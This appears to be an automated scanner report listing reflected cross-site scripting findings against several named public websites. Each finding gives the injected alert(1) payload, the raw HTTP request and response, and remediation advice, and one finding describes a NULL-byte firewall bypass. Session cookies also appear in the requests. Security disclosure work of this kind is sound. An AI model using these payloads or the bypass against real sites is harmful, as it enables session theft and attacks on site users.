Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003b3c6"><script>alert(1)</script>f91c047f372 was submitted in the REST URL parameter 1. This input was echoed as 3b3c6"><script>alert(1)</script>f91c047f372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%003b3c6"><script>alert(1)</script>f91c047f372 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2f1'-alert(1)-'c17a993ea7e was submitted in the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html?[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT=6f2f1'-alert(1)-'c17a993ea7e HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396861659244; ts=12/13/2010+9:01:05+PM; z=4; sid=b6ff4608-269f-4916-824f-4c4e6c59df4e; av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419; vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:03:02 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419:b8fb4.6339b=1218102102; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0|vB8FB4:6339B_0_0_0_1FD04E_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 19 Dec 2010 03:03:01 GMT Content-Length: 1128 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150d45525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:08:02 GMT;path=/
1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vancouverdisabilitiesday.ca
Path:
/%20target=
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8d8"><script>alert(1)</script>2c87a4594e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /%20target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1 HTTP/1.1 Host: vancouverdisabilitiesday.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 03:05:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 727 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSSAARTS=BHHGAGICMPCFNDPLDIPAAJMM; path=/ Cache-control: private
<html> <head> <title>International Day of Persons with Disabilities</title> <meta name="description" content="Dec. 3, 2008 Roundhouse Community Centre"> <meta name="keywords" content="dis ...[SNIP]... <frame src="http://members.shaw.ca/ckiyooka// target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1" name="pageRedirect"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d18<script>alert(1)</script>98cf4f6e2eb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/email/share/?callback=?a9d18<script>alert(1)</script>98cf4f6e2eb HTTP/1.1 Host: ww3.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:06:34 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 62 Connection: close Content-Type: application/json
The value of the returnurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f89'%3balert(1)//ba364a55228 was submitted in the returnurl parameter. This input was echoed as 43f89';alert(1)//ba364a55228 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/pluck/atc/?returnurl=43f89'%3balert(1)//ba364a55228 HTTP/1.1 Host: ww3.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:06:32 GMT Server: Apache/2.2.3 (Red Hat) Content-Length: 251 Connection: close Content-Type: text/html; charset=UTF-8
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f878a"><script>alert(1)</script>30b222b59b0 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /Compare-Annuity-Rates-2?utm_source=Googlef878a"><script>alert(1)</script>30b222b59b0&utm_campaign=annuity_placement_targeting HTTP/1.1 Host: www.advisorworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:06:12 GMT Server: Apache/1.3.42 (Unix) PHP/5.2.14 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Cache-Control: max-age=1209600 Expires: Sun, 02 Jan 2011 03:06:12 GMT X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 16857
1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ashoka.org
Path:
/story/6495
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5291e"><script>alert(1)</script>8b1ed0d8a05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1 HTTP/1.1 Host: www.ashoka.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:06:17 GMT Server: Apache/2.2.0 (Fedora) X-Powered-By: PHP/5.2.8 Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=3gddqs6ddqmdpo5f9i2v30mlb7; expires=Tue, 11 Jan 2011 06:39:37 GMT; path=/; domain=.ashoka.org Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 19 Dec 2010 03:06:17 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26921
<!-- This comment is intentional to keep the back compat in ie 7.0 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http:/ ...[SNIP]... <a name="fb_share" type="button_count" share_url="http://www.ashoka.org/story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ashoka.org
Path:
/story/6495
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773df'-alert(1)-'5b4b835de75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/6495?773df'-alert(1)-'5b4b835de75=1 HTTP/1.1 Host: www.ashoka.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:06:18 GMT Server: Apache/2.2.0 (Fedora) X-Powered-By: PHP/5.2.8 Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=dsp2ml8nb8mjok58innb7rlpl2; expires=Tue, 11 Jan 2011 06:39:38 GMT; path=/; domain=.ashoka.org Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 19 Dec 2010 03:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26876
<!-- This comment is intentional to keep the back compat in ie 7.0 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http:/ ...[SNIP]... <script>tweetmeme_style = 'compact'; tweetmeme_url = 'http://www.ashoka.org/story/6495?773df'-alert(1)-'5b4b835de75=1'; tweetmeme_source = '';</script> ...[SNIP]...
1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.canada.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f46'%3balert(1)//9b6decae86e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5f46';alert(1)//9b6decae86e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d5f46'%3balert(1)//9b6decae86e=1 HTTP/1.1 Host: www.canada.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 272523 Expires: Sun, 19 Dec 2010 03:08:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:07 GMT Connection: close Set-Cookie: ASP.NET_SessionId=1camde55elyruhzm0d0hya45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... acebook/poll.html'; var bundle_id = ''; var question = 'Is an e-mail a good enough substitute for a Christmas card?'; var voted = 'False'; var poll_url = 'http://www.canada.com/facebook/poll.html?d5f46';alert(1)//9b6decae86e=1&qid=106525'; var poll_topic = 'Christmas cards'; var encoded_poll_url = 'http%3a%2f%2fwww.canada.com%2ffacebook%2fpoll.html%3fd5f46'%3balert(1)%2f%2f9b6decae86e%3d1%26qid%3d106525'; var host = 'h ...[SNIP]...
1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cheap-registrar.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d254"><script>alert(1)</script>ad40d2e47f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5d254"><script>alert(1)</script>ad40d2e47f1=1 HTTP/1.1 Host: www.cheap-registrar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 03:07:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 738
<html><head> <meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business."> <title>$1.99 Registrations at Cheap Registrar</title></head> <!-- Redirec ...[SNIP]... <a href="http://www.securepaynet.net/5d254"><script>alert(1)</script>ad40d2e47f1=1"> ...[SNIP]...
1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cheap-registrar.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2ea"><script>alert(1)</script>6b27097126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3a2ea"><script>alert(1)</script>6b27097126=1 HTTP/1.1 Host: www.cheap-registrar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 03:07:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 736
<html><head> <meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business."> <title>$1.99 Registrations at Cheap Registrar</title></head> <!-- Redirec ...[SNIP]... <frame src="http://www.securepaynet.net/3a2ea"><script>alert(1)</script>6b27097126=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df587<a>ce53c9e6599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/df587<a>ce53c9e6599 HTTP/1.1 Host: www.domaintools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Dec 2010 04:07:47 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sun, 19 Dec 2010 03:07:47 GMT Content-Length: 6763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>ce53c9e6599">Whois record for "df587<a>ce53c9e6599"</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa5d8<a>c0b22e683b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/reports/aa5d8<a>c0b22e683b3 HTTP/1.1 Host: www.domaintools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Dec 2010 03:58:11 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sun, 19 Dec 2010 02:58:11 GMT Content-Length: 6773 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>c0b22e683b3">Whois record for "aa5d8<a>c0b22e683b3"</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc9b4<a>517b058ca68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/fc9b4<a>517b058ca68 HTTP/1.1 Host: www.domaintools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Dec 2010 04:07:47 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sun, 19 Dec 2010 03:07:47 GMT Content-Length: 6763 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>517b058ca68">Whois record for "fc9b4<a>517b058ca68"</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34784<a>3c620300a71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /reverse-ip/34784<a>3c620300a71 HTTP/1.1 Host: www.domaintools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Dec 2010 04:07:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sun, 19 Dec 2010 03:07:32 GMT Content-Length: 6765 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>3c620300a71">Whois record for "34784<a>3c620300a71"</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'%3bf5e376ba32d was submitted in the REST URL parameter 1. This input was echoed as 2c848';f5e376ba32d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2c848'%3bf5e376ba32d HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9a4'%3b247ade30c83 was submitted in the REST URL parameter 1. This input was echoed as ce9a4';247ade30c83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ce9a4'%3b247ade30c83 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4e2'%3bd9af8f915db was submitted in the REST URL parameter 1. This input was echoed as 9c4e2';d9af8f915db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9c4e2'%3bd9af8f915db HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf31'%3bc915d077dc3 was submitted in the REST URL parameter 1. This input was echoed as 7cf31';c915d077dc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
